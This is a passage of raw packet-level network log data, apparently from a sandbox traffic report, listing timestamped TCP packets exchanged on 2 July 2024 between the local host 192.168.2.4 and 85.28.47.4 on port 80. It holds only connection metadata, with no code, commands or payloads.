                                            Jul 2, 2024 08:26:29.289769888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289777994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289777994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289793968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289810896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289866924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289912939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289922953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289937019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289961100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289971113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290148020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290160894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290173054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290184975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290195942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290199041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290210009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290220022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290232897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290256977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290445089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290456057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290467024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290487051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290488005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290502071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290502071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290513992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290519953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290525913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290537119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290539026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290549994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290555000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290561914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.290577888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.290601969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291126966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291141033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291152954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291163921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291176081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291178942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291188002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291189909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291199923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291210890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291212082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291223049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291234970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291234970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291248083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291254044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291260004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291271925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291271925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291284084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291292906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291296005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291310072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291311026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291321993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.291331053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291347027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.291369915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292026997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292040110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292053938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292066097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292072058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292077065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292083025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292089939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292099953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292107105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292118073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292119980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292129993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292139053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292141914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292157888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292166948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292174101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292197943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292535067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292547941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292558908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292572021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292589903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292589903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292603016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292612076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292614937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292625904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292627096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292639017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292649984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292659998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292661905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292673111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292674065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292686939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292692900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292701006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292712927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292716980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292725086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292737007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.292745113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292763948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.292778015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293555021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293569088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293581009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293592930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293601990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293606043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293612003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293617964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293629885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293641090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293646097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293652058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293664932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293668032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293678045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293685913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293689013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293700933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293701887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293711901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293723106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293731928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293735027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293746948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293751001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293760061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.293770075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293788910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.293811083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294471025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294485092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294497013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294507980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294519901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294522047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294532061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294540882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294543028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294554949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294565916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294570923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294576883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294579983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294589043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294600010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294605970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294611931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.294621944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.294642925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.379861116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.379879951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.379898071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.379942894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.379977942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.379997015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380008936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380036116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380059004 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380165100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380177975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380198002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380207062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380211115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380220890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380222082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380234003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380237103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380254984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380300045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380517006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380528927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380539894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380551100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380561113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380570889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380575895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380611897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380628109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380825996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380836010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380847931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380860090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380871058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380877972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380893946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380933046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.380965948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380976915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.380987883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381006956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381006956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381026030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381105900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381150007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381258011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381270885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381282091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381292105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381304979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381305933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381319046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381351948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381606102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381617069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381627083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381639004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381649971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381655931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381660938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381673098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381679058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381688118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381716013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381747007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381761074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381771088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381788015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381808996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381894112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381906033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381917000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381930113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.381931067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381966114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.381975889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382276058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382287025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382297993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382309914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382322073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382327080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382332087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382344961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382352114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382369041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382395029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382440090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382448912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382452011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382455111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382474899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382482052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382486105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382498026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382498980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382510900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382522106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382525921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382534981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382545948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382546902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382565022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382574081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382592916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382592916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382603884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382608891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382616043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382627010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382636070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382638931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382657051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382663012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382668972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382682085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382684946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382697105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382708073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382709026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382719994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382730961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382731915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382742882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382754087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382755041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382766962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382776976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382778883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382791996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382802010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382805109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382812977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382813931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382827997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382838964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382841110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382850885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382863045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.382865906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382884979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.382901907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383079052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383090973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383101940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383112907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383116961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383125067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383132935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383136034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383142948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383150101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383162022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383169889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383172989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383186102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383188963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383197069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383208990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383210897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383219957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383232117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383235931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383244038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383246899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383255959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383268118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383271933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383299112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383945942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383958101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383968115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383979082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383990049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.383999109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.383999109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.384001017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.384011984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.384032011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.384053946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471715927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471735954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471748114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471762896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471812010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471831083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471843958 CEST806388085.28.47.4192.168.2.4
